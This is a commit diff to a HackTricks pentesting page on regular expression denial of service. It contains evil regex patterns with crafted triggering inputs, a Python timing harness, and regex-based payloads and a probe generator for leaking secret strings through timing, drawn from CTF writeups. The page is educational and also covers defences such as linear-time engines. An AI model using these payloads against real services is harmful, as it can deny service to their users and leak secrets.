Commit 8807c23

Merge pull request #1453 from HackTricks-wiki/research_update_src_pentesting-web_regular-expression-denial-of-service-redos_20251001_082618
Research Update Enhanced src/pentesting-web/regular-expressi...
2 parents cd60902 + 58ca1e4 commit 8807c23

1 file changed

+55
-8
lines changed

src/pentesting-web/regular-expression-denial-of-service-redos.md

@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad

## The Problematic Regex Naïve Algorithm

**Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**

### Engine behavior and exploitability

- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
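
As a rough illustration of why nested quantifiers are costly, the sketch below counts how many ways a pattern like `(a+)+` can split a run of `n` identical characters into non-empty groups. The helper name `count_splits` is made up for this example; it models the search space a backtracking matcher may have to exhaust when the overall match fails, not the internals of any specific engine.

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def count_splits(n: int) -> int:
    """Number of ways to cut a run of n chars into consecutive non-empty groups."""
    if n == 0:
        return 1  # nothing left to split: one completed way
    # The first group takes k chars (1..n); the remainder is split recursively.
    return sum(count_splits(n - k) for k in range(1, n + 1))


for n in (5, 10, 20, 30):
    print(n, count_splits(n))
```

The count doubles with every extra character (it equals 2^(n-1) for n >= 1), which is why a failing tail after a long ambiguous run can make matching time explode.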

## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>

@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
- ([a-zA-Z]+)\*
- (a|aa)+
- (a|a?)+
- (.*a){x} for x > 10

All of these are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.

### Practical recipe to build PoCs

Most catastrophic cases follow this shape:

- Prefix that gets you into the vulnerable subpattern (optional).
- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).
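
The three-part shape above can be sketched as a small helper. The function name `build_payload` and its parameters are hypothetical, chosen only to mirror the prefix / long run / failing tail structure.

```python
def build_payload(filler: str, n: int, tail: str = "!", prefix: str = "") -> str:
    """Assemble: optional prefix + filler repeated n times + a tail that forces failure."""
    return prefix + filler * n + tail


# A plain run of 'a' with a failing '!' tail
print(build_payload("a", 8))
# A 'v' prefix followed by a run of underscores and the same failing tail
print(build_payload("_", 8, prefix="v"))
```

Keeping `n` as a parameter makes it easy to grow the payload step by step while watching response times.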

Minimal examples:

- `(a+)+$` vs input `"a"*N + "!"`
- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`

Increase N and observe super‑linear growth.

#### Quick timing harness (Python)

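```python
import re
import time

# Ambiguous run of '_' (which \w also matches) followed by a failing tail
pat = re.compile(r'(\w*_)\w*$')
for n in [2**k for k in range(8, 15)]:
    s = 'v' + '_' * n + '!'      # the trailing '!' forces the overall match to fail
    t0 = time.perf_counter()     # monotonic, high-resolution timer
    pat.search(s)
    dt = time.perf_counter() - t0
    print(n, f"{dt:.3f}s")
```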
55+
2556
## ReDoS Payloads
2657

2758
### String Exfiltration via ReDoS
@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (

- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
  - Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one: `<flag>(((((((.*)*)*)*)*)*)*)!`
- In [**this writeup**](https://ctftime.org/writeup/25869) the author used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
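
A minimal sketch of how such probes might be generated for a character-by-character guess, assuming the target evaluates an attacker-supplied pattern against the secret and that a slow response means the lookahead matched. The names `build_probe` and `candidate_probes` are hypothetical, `re.escape` follows Python's escaping rules (the target engine may need different escaping), and sending each probe and timing the response is deliberately left out.

```python
import re
import string

# Expensive tail taken from the first rule above; it is only reached if the lookahead succeeds.
SLOW_TAIL = "((.*)*)*salt$"


def build_probe(guess: str, tail: str = SLOW_TAIL) -> str:
    """Return a pattern meant to backtrack heavily only when the secret starts with `guess`."""
    return "^(?=" + re.escape(guess) + ")" + tail


def candidate_probes(known_prefix: str, alphabet: str):
    """Yield (char, pattern) pairs that extend the known prefix by one character."""
    for ch in alphabet:
        yield ch, build_probe(known_prefix + ch)


for ch, pattern in candidate_probes("HTB{", string.ascii_lowercase[:3]):
    print(ch, pattern)
```

In practice, the candidate whose probe produces a clearly slower response would be appended to the known prefix, and the loop repeated for the next position.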

### ReDoS Controlling Input and Regex
@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
*/
```

### Language/engine notes for attackers

- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when the regex and input are attacker‑influenced.
- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.

## Tools

- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
  - Find vulnerable regexes and auto‑generate evil inputs. Examples:
    - `pip install regexploit`
    - Analyze one pattern interactively: `regexploit`
    - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/`
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
  - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
  - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.

> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Super‑linear growth, and exponential growth in particular, strongly indicates a viable ReDoS.
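
One way to read such doubling measurements is to look at the base-2 logarithm of the latency ratio between consecutive samples. The sketch below uses a hypothetical helper, `doubling_exponents`, and made-up timings purely for illustration; real measurements will be noisier and should be repeated.

```python
import math


def doubling_exponents(samples):
    """samples: list of (length, seconds) pairs, lengths doubling each step, seconds > 0.

    Returns log2 of the latency ratio between each pair of consecutive samples.
    """
    return [math.log2(t2 / t1) for (_, t1), (_, t2) in zip(samples, samples[1:])]


# Made-up measurements for illustration only
quadratic_like = [(256, 0.01), (512, 0.04), (1024, 0.16)]
exponential_like = [(10, 0.001), (20, 1.0), (40, 1_000_000.0)]

print(doubling_exponents(quadratic_like))
print(doubling_exponents(exponential_like))
```

A roughly constant value d suggests polynomial growth of degree about d, while values that keep increasing from step to step point to exponential behavior.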

## References

- [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
- SoK (2024), A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS): [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
- Why RE2 (linear‑time regex engine): [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)

{{#include ../banners/hacktricks-training.md}}